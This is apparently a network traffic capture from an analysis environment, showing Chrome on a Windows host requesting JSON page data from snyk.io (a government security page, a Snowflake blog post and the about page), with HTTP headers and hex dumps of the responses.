                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              131192.168.2.54989323.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC458OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/government-security-solution.json?slug=government-security-solution HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC641INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"10a55clfdau13tv"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/government-security-solution.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::2fcxt-1729799354867-ab7773aeaa27
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:14 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799354.1095fa3
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC15743INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 35 4d 50 79 76 30 32 6e 41 6e 4f 73 32 76 5a 78 54 74 49 4e 49 47 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 30 39 54 32 31 3a 34 38 3a 32 32 2e 31 37 39 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 32 34 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5MPyv02nAnOs2vZxTtINIG","type":"Entry","createdAt":"2022-11-09T21:48:22.179Z","updatedAt":"2024-07-24T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC8845INData Raw: 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 53 6e 79 6b 20 68 65 6c 70 73 20 73 61 74 69 73 66 79 20 74 68 65 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 2f 62 6c 6f 67 2f 62 69 64 65 6e 2d 61 69 2d 73 61 66 65 74 79 2d 65 78 65 63 75 74 69 76 65 2d 6f 72 64 65 72 2f 22 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 75 6e 64 65 72 6c 69 6e 65 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 57 68
                                                                                                                                                                                                                                                                                                              Data Ascii: ,"description":{"data":{},"content":[{"data":{},"content":[{"data":{},"marks":[],"value":"Snyk helps satisfy the ","nodeType":"text"},{"data":{"uri":"/blog/biden-ai-safety-executive-order/"},"content":[{"data":{},"marks":[{"type":"underline"}],"value":"Wh
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 61 62 65 6c 22 3a 22 53 69 67 6e 20 75 70 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 70 70 2e 73 6e 79 6b 2e 69 6f 2f 73 69 67 6e 75 70 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 62 75 74 74 6f 6e 22 3a 7b 22 76 61 72 69 61 6e 74 22 3a 22 73 65 63 6f 6e 64 61 72 79 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 52 41 37 45 48 76 58 4f 30 68 30 44 35 34 73 4e 46 77 58 4d 44 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 41 74 6f 6d 42 75 74 74 6f 6e 22 2c 22 6c 61 62 65 6c 22 3a 22 42 6f 6f 6b 20 61 20 6c 69 76 65 20 64 65 6d 6f 22 2c 22 75 72 6c 22 3a 22 2f 73 63 68 65 64 75 6c 65 2d 61 2d 64 65 6d 6f 2f 22 2c 22 61 70 70 65 61 72 61
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000abel":"Sign up","url":"https://app.snyk.io/signup","appearance":{"button":{"variant":"secondary"}}},{"sys":{"id":"3RA7EHvXO0h0D54sNFwXMD","__typename":"Sys"},"__typename":"AtomButton","label":"Book a live demo","url":"/schedule-a-demo/","appeara
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC8204INData Raw: 73 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 31 78 33 6c 4e 77 6e 66 78 4f 69 30 67 4a 31 42 6f 41 6c 43 38 64 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 4f 75 72 20 63 75 73 74 6f 6d 65 72 73 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 75 72 6c 22 3a 22 2f 63 75 73 74 6f 6d 65 72 73 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 63 75 73 74 6f 6d 65 72 73 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 59 4b 71 4a 64 50 7a 77 4a 30 30 42 35 4a 45 65 46 66 4c 51 67 22 2c 22 5f 5f 74 79 70
                                                                                                                                                                                                                                                                                                              Data Ascii: s"}}},{"sys":{"id":"1x3lNwnfxOi0gJ1BoAlC8d","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Our customers","description":null,"url":"/customers/","appearance":{"navItem":{"icon":"customers"}}},{"sys":{"id":"3YKqJdPzwJ00B5JEeFfLQg","__typ
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC2502INData Raw: 30 30 30 30 30 39 42 41 0d 0a 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 53 6e 79 6b 20 55 73 65 72 20 44 6f 63 73 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 73 6e 79 6b 2e 69 6f 2f 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 37 42 52 73 5a 6d 66 6e 30 65 48 4b 32 74 57 70 4d 55 41 42 32 65 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 53 6e 79 6b 20 53 75 70 70 6f 72 74 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 73 6e 79 6b 2e 69 6f 2f 68 63 2f 65 6e 2d 75 73 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 000009BAavigationItem","label":"Snyk User Docs","url":"https://docs.snyk.io/"},{"sys":{"id":"7BRsZmfn0eHK2tWpMUAB2e","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Snyk Support","url":"https://support.snyk.io/hc/en-us"},{"sys":{"id":"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              132192.168.2.54989223.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC657OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/blog/snyk-snowflake-data-share.json?slug=snyk-snowflake-data-share HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC588INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"161n0ij5epvz3r"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/blog/[slug].json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::tvg8k-1729799354890-b301780af59b
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:14 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 45539
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799354.1f61650
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC15796INData Raw: 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 35 56 73 65 47 36 50 6f 33 63 78 4b 70 75 69 66 64 49 4d 43 4c 33 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 38 2d 30 36 54 31 33 3a 31 32 3a 30 35 2e 37 35 36 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 38 2d 30 36 54 31 33 3a 31 32 3a 30 35 2e 37
                                                                                                                                                                                                                                                                                                              Data Ascii: {"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5VseG6Po3cxKpuifdIMCL3","type":"Entry","createdAt":"2024-08-06T13:12:05.756Z","updatedAt":"2024-08-06T13:12:05.7
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC16384INData Raw: 65 20 64 61 73 68 62 6f 61 72 64 73 20 66 6f 72 20 6f 75 72 20 64 61 79 2d 74 6f 2d 64 61 79 20 6f 70 65 72 61 74 69 6f 6e 2c 20 61 73 20 77 65 6c 6c 20 61 73 20 70 72 6f 76 69 64 65 20 74 68 65 20 6d 61 6e 61 67 65 6d 65 6e 74 20 74 65 61 6d 20 77 69 74 68 20 61 20 6d 6f 72 65 20 68 69 67 68 2d 6c 65 76 65 6c 20 6f 76 65 72 76 69 65 77 22 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 64 61 74 61 22 3a 7b 7d 7d 5d 7d 5d 7d 2c 7b 22 6e 6f 64 65 54 79 70 65 22 3a 22 6c 69 73 74 2d 69 74 65 6d 22 2c 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 2c 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 2c 22 76 61 6c 75
                                                                                                                                                                                                                                                                                                              Data Ascii: e dashboards for our day-to-day operation, as well as provide the management team with a more high-level overview","marks":[],"data":{}}]}]},{"nodeType":"list-item","data":{},"content":[{"nodeType":"paragraph","data":{},"content":[{"nodeType":"text","valu
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC3602INData Raw: 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 22 2c 22 72 6f 77 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 36 67 58 44 6d 57 67 61 58 7a 45 39 34 4c 67 34 74 4e 53 46 4b 4a 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 22 2c 22 6c 61 62 65 6c 22 3a 22 43 6f 6d 70 61 6e 79 22 2c 22 73 70 6f 74 6c 69 67 68 74 46 69 72 73 74 49 74 65 6d 22 3a 66 61
                                                                                                                                                                                                                                                                                                              Data Ascii: e":"NavigationDropdownMenuColumn","rows":{"__typename":"NavigationDropdownMenuColumnRowsCollection","items":[{"sys":{"id":"6gXDmWgaXzE94Lg4tNSFKJ","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumnRow","label":"Company","spotlightFirstItem":fa
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC9757INData Raw: 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4d 6f 6c 65 63 75 6c 65 4d 65 64 69 61 43 61 72 64 22 2c 22 69 6d 61 67 65 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 37 32 37 38 37 30 30 34 33 2f 66 65 61 74 75 72 65 2d 63 6f 64 65 2d 72 69 73 65 2e 70 6e 67 22 2c 22 74 61 67 73 22 3a 5b 5d 2c 22 74 79 70 65 22 3a 22 75 70 6c 6f 61 64 22 2c 22 62 79 74 65 73 22 3a 37 31 35 37 36 35 2c 22 77 69 64 74 68 22 3a 31 32 30 30 2c 22 66 6f 72 6d 61 74 22 3a 22 70 6e 67 22 2c 22 68 65 69 67 68 74 22 3a 36 32 38 2c 22 76 65 72 73 69 6f 6e 22 3a 31 37 32 37 38 37 30 30 34 33 2c 22 64 75 72 61 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 6d 65 74 61 64 61 74
                                                                                                                                                                                                                                                                                                              Data Ascii: __typename":"MoleculeMediaCard","image":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1727870043/feature-code-rise.png","tags":[],"type":"upload","bytes":715765,"width":1200,"format":"png","height":628,"version":1727870043,"duration":null,"metadat


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              133192.168.2.54989523.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC612OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/about.json?slug=about HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"lmx76bg65t2hmc"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/about.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::tvg8k-1729799355181-a7dfb86112a3
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:15 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799355.1f6168a
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC15767INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 32 74 66 32 33 55 33 4f 30 64 6f 53 34 45 43 67 78 37 41 6b 6d 44 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 30 2d 32 31 54 32 33 3a 32 35 3a 33 33 2e 31 39 37 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 33 2d 30 31 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2tf23U3O0doS4ECgx7AkmD","type":"Entry","createdAt":"2022-10-21T23:25:33.197Z","updatedAt":"2024-03-01T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC16006INData Raw: 30 32 33 2d 30 37 2d 31 38 54 31 35 3a 33 34 3a 34 39 5a 22 2c 22 73 65 63 75 72 65 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 36 38 39 36 39 34 34 38 39 2f 6c 6f 67 6f 2d 64 66 64 73 2e 73 76 67 22 2c 22 72 65 73 6f 75 72 63 65 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 22 2c 22 72 61 77 5f 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 22 3a 22 22 7d 5d 2c 22 69 73 43 75 73 74 6f 6d 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 50 61 72 74 6e 65 72 22 3a 66 61 6c 73 65 7d 7d 7d 7d 5d 2c 22 70 72 6f 64 75 63 74 73 46 65 61 74 75 72 65 64 22 3a 5b 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d
                                                                                                                                                                                                                                                                                                              Data Ascii: 023-07-18T15:34:49Z","secure_url":"https://res.cloudinary.com/snyk/image/upload/v1689694489/logo-dfds.svg","resource_type":"image","raw_transformation":""}],"isCustomer":false,"isPartner":false}}}}],"productsFeatured":[{"metadata":{"tags":[],"concepts":[]
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC16384INData Raw: 2c 22 68 65 69 67 68 74 22 3a 31 35 2c 22 76 65 72 73 69 6f 6e 22 3a 31 36 31 36 37 36 37 34 39 38 2c 22 64 75 72 61 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 6d 65 74 61 64 61 74 61 22 3a 5b 5d 2c 22 70 75 62 6c 69 63 5f 69 64 22 3a 22 77 6f 72 64 70 72 65 73 73 2d 73 79 6e 63 2f 6c 6f 67 6f 2d 61 74 6c 61 73 73 69 61 6e 22 2c 22 63 72 65 61 74 65 64 5f 61 74 22 3a 22 32 30 32 31 2d 30 33 2d 32 36 54 31 34 3a 30 34 3a 35 38 5a 22 2c 22 73 65 63 75 72 65 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 36 31 36 37 36 37 34 39 38 2f 77 6f 72 64 70 72 65 73 73 2d 73 79 6e 63 2f 6c 6f 67 6f 2d 61 74 6c 61 73 73 69 61 6e 2e 73 76 67 22 2c 22 72 65 73 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: ,"height":15,"version":1616767498,"duration":null,"metadata":[],"public_id":"wordpress-sync/logo-atlassian","created_at":"2021-03-26T14:04:58Z","secure_url":"https://res.cloudinary.com/snyk/image/upload/v1616767498/wordpress-sync/logo-atlassian.svg","reso
